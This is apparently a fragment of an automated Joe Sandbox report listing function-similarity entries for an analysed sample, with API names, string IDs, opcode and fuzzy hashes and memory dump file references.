                                                                                                                                                                                                      • API String ID: 511038203-1064663049
                                                                                                                                                                                                      • Opcode ID: b19d77ac789cdbe29c9194ad78d8f6bb0c068b789d2cf2a92529c42ea69059c1
                                                                                                                                                                                                      • Instruction ID: 3160b18c214b4ea7315c83d82560d94143b95c879e8dcdc4b5b182cfb11ab86b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b19d77ac789cdbe29c9194ad78d8f6bb0c068b789d2cf2a92529c42ea69059c1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED73F732E08686CAE751CA3684422B96790FF1D784F196739DE49B76B9DF29F448CF00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturnmemchrmemset$__stdio_common_vsnprintf_smemcpy
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3704722475-0
                                                                                                                                                                                                      • Opcode ID: e6e141a76f4e5f3bbba2b472fb7d4bd3583d7bd85d57cab17a705577fc0dda16
                                                                                                                                                                                                      • Instruction ID: 6d07396ef466a866ef8c87b9ba20f1088eb243840883a377fc5e103234086c11
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6e141a76f4e5f3bbba2b472fb7d4bd3583d7bd85d57cab17a705577fc0dda16
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A122DC32A18B84C5E711CF65E4412AD7760FF98B98F04933AEE8D67A69DF78E184C700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 313767242-0
                                                                                                                                                                                                      • Opcode ID: 4b425470dafeb125ad6e4cea48ddc885b8a0de9b9862f8a9bb31daf75116dafd
                                                                                                                                                                                                      • Instruction ID: 173fb17f6b87059ba78694433c3ffb18df1d7a5748a9bbd124ce015723cd470b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b425470dafeb125ad6e4cea48ddc885b8a0de9b9862f8a9bb31daf75116dafd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE314F72604B85C6EB609F60E8517E97364FB48B48F44443ADB4E87BA8DF38D64CC710
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: sqrtf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 321154650-0
                                                                                                                                                                                                      • Opcode ID: 2dc1d86fca427c9c0bc5c93b8922f844cb79463381ea3272e2c15cb29c3e3054
                                                                                                                                                                                                      • Instruction ID: 22789ee8f8711d3572213d5b2b9600ea320ca636ca08ada8375ac44dce43e755
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2dc1d86fca427c9c0bc5c93b8922f844cb79463381ea3272e2c15cb29c3e3054
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BB18522E28BCC81E123963754821F9E250AFBF3C5F2DDB27F984766B6DF2461D19640
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 453615576-0
                                                                                                                                                                                                      • Opcode ID: 303681f9e7cbe62765dbfb0a9134f4b8150c769aead48dd747dc0cc04bc40eea
                                                                                                                                                                                                      • Instruction ID: 0b75cf31c9d2706324ad1030bbf65be54deb88297ffa9eea7740a24ed10f8407
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 303681f9e7cbe62765dbfb0a9134f4b8150c769aead48dd747dc0cc04bc40eea
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC319E21A48A42C6EA209B10E55627DE3A1FF4CF90F084638DA9D877BCDE3CE049C704
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: sqrtf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 321154650-0
                                                                                                                                                                                                      • Opcode ID: d0354dbd71e7030d5bded96ea694d1369bacf779f8b23e7d26d1dbb03177f4ad
                                                                                                                                                                                                      • Instruction ID: b88aea86789ce544f1a6c8ed45f94d6d9d945f9324f443809c3ecbd0ab4cd779
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0354dbd71e7030d5bded96ea694d1369bacf779f8b23e7d26d1dbb03177f4ad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8924933920B889AD712CF3785821A9B760FF6D784719DB16EA0867776DB34F1A4DB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: sqrtf
                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                      • API String ID: 321154650-3887548279
                                                                                                                                                                                                      • Opcode ID: 2f311027faccff7dd881e195b7fe7286059ee0ec87fa41f57f7eea428b0ada40
                                                                                                                                                                                                      • Instruction ID: 79d8883693d768ca6a6113d038308d00f4ccfd4f6d27f290f74ef084d7916b6e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f311027faccff7dd881e195b7fe7286059ee0ec87fa41f57f7eea428b0ada40
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F129033924BC886D312CF3A85421ADB361FF6E788B19D716EA0873676DF35A1A5D700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: freemallocmemchrmemcpy
                                                                                                                                                                                                      • String ID: %*s%.*s$ %.*s$#CLOSE$#COLLAPSE
                                                                                                                                                                                                      • API String ID: 3682640872-4275869412
                                                                                                                                                                                                      • Opcode ID: 2ce57d9284d9ef0e70a83944aa9e319a8bdb969bab05396b12aca257139112c0
                                                                                                                                                                                                      • Instruction ID: ae416c0f74b1ea05b98863dd03d395c5ec49e61c6f41f6851be3e1250628f246
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ce57d9284d9ef0e70a83944aa9e319a8bdb969bab05396b12aca257139112c0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5192C432A04B89DBD716CB3685412E9B7A0FF5D744F089739DB18A75A6DF38B0A4CB40
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memset$malloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1671641884-0
                                                                                                                                                                                                      • Opcode ID: 73fda1adc7783b6dc2bc5ba3034a00d0588fe211ed4dabdaf8867232c2ff8382
                                                                                                                                                                                                      • Instruction ID: e5ae297457708969000c6d77e4853fd91640ee8eea56936ce1cbdf965861ed4a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73fda1adc7783b6dc2bc5ba3034a00d0588fe211ed4dabdaf8867232c2ff8382
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3D1B532909AC5C6E7658F2AD1412A9B364FF5CB84F089735DB48A3779EF38E551CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: powf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3445610689-0
                                                                                                                                                                                                      • Opcode ID: 9b970626a51ef16c0d90f84d468d31c4e4b87833e8d13c11776a59ccd446aa78
                                                                                                                                                                                                      • Instruction ID: 20ea2f27ece7ccc85764f791678c5365ed8ce931cb837c63afe8ced5b9ee0b3c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b970626a51ef16c0d90f84d468d31c4e4b87833e8d13c11776a59ccd446aa78
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B122C22D09B89C6E613963750032B96250BF6E7C4F1C9B36ED49F76B6DF297181CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memchr
                                                                                                                                                                                                      • String ID: ...
                                                                                                                                                                                                      • API String ID: 3297308162-440645147
                                                                                                                                                                                                      • Opcode ID: c6435483ec3d671f3d85b7d4afd6859e99abfc328924778e390f82392c2f1fda
                                                                                                                                                                                                      • Instruction ID: f22ab8bd35bfc4012dc79c8103dabb2ff244b6fad84aa33a0d2f27bf6f5b179f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6435483ec3d671f3d85b7d4afd6859e99abfc328924778e390f82392c2f1fda
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFF1BB329487C9C1E2529B3690023F9B350FF6D784F189736EA48775B6EF79A581DB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: powf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3445610689-0
                                                                                                                                                                                                      • Opcode ID: 27d724f9d89d8e31fa2915028225f72f30567e0b78aab85fd24df9c59b0333bf
                                                                                                                                                                                                      • Instruction ID: 828eef6fcebf9bb7d377a0e8e048c66cba6eb5c6359e63e893f710e06452abfb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27d724f9d89d8e31fa2915028225f72f30567e0b78aab85fd24df9c59b0333bf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9E1E622D0868DC5E2139B3750431B9A351BF6E784F2D9B36ED68B76B5DF287581CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: powf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3445610689-0
                                                                                                                                                                                                      • Opcode ID: a8716a77cc624c65f86a60f56604ac373fc2b09dee02c0982d31be60c1d05c81
                                                                                                                                                                                                      • Instruction ID: d3eeafc3e220797a0976927335c354b02a8c9655f10ecd099c982256d5eff713
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8716a77cc624c65f86a60f56604ac373fc2b09dee02c0982d31be60c1d05c81
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92E1A922D087C9C5E262963750431BD6350BF6E784F1DAB36ED68B727ADF297581CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: 68b17967bcc8f24075929cf533a102afb4a1d372892b07f6497a9256c3c38c92
                                                                                                                                                                                                      • Instruction ID: 180a2c32205ede117101bc9738abfd009c941a2fa91d19d287c54e005d39f131
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68b17967bcc8f24075929cf533a102afb4a1d372892b07f6497a9256c3c38c92
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69111C22B54F05CAEB008B60E8552B933A4FB1DB58F441E35DA6D877A8DF7CE169C340
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                      • String ID: !x-sys-default-locale
                                                                                                                                                                                                      • API String ID: 4235545615-2729719199
                                                                                                                                                                                                      • Opcode ID: de6593503dd31d5c32caa29e898329b389dd4942f4c7a2da7046951feceb99c3
                                                                                                                                                                                                      • Instruction ID: 5ca5c16a64adbde7acc960c8fa91a3e91a10f14a3e978c393d5de18d5302e31c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: de6593503dd31d5c32caa29e898329b389dd4942f4c7a2da7046951feceb99c3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16018871B08B46C2E7118B12B46177A6661FF88B95F448139D68D87AACCF3CE50DC700
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: %*s%.*s$ %.*s
                                                                                                                                                                                                      • API String ID: 0-3400057116
                                                                                                                                                                                                      • Opcode ID: d7835d36624c6e4837c03091a680af5c084d6deef8ca5dd22d6340a9da368d8e
